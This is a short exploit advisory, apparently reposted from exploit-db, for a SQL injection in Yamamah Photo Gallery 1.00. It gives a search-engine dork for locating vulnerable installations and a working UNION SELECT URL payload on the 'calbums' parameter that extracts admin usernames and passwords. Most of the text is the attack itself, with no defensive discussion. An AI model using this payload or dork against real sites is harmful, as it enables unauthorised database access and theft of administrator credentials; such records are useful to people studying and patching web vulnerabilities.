Yamamah Photo Gallery 1.00 – ‘calbums’ SQL Injection

  • 作者: CoBRa_21
    日期: 2010-06-13
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/13857/
  • ##################################################################################################

Yamamah Photo Gallery 1.00 SQL Injection Vulnerability

##################################################################################################

Author : CoBRa_21

Script Home : http://www.yamamah.org/

Dork : "Powered By : Yamamah Version 1.00"

##################################################################################################

SQL Injection:

http://localhost/[path]/?calbums=-2 union select 0,1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12,13 from admin--

##################################################################################################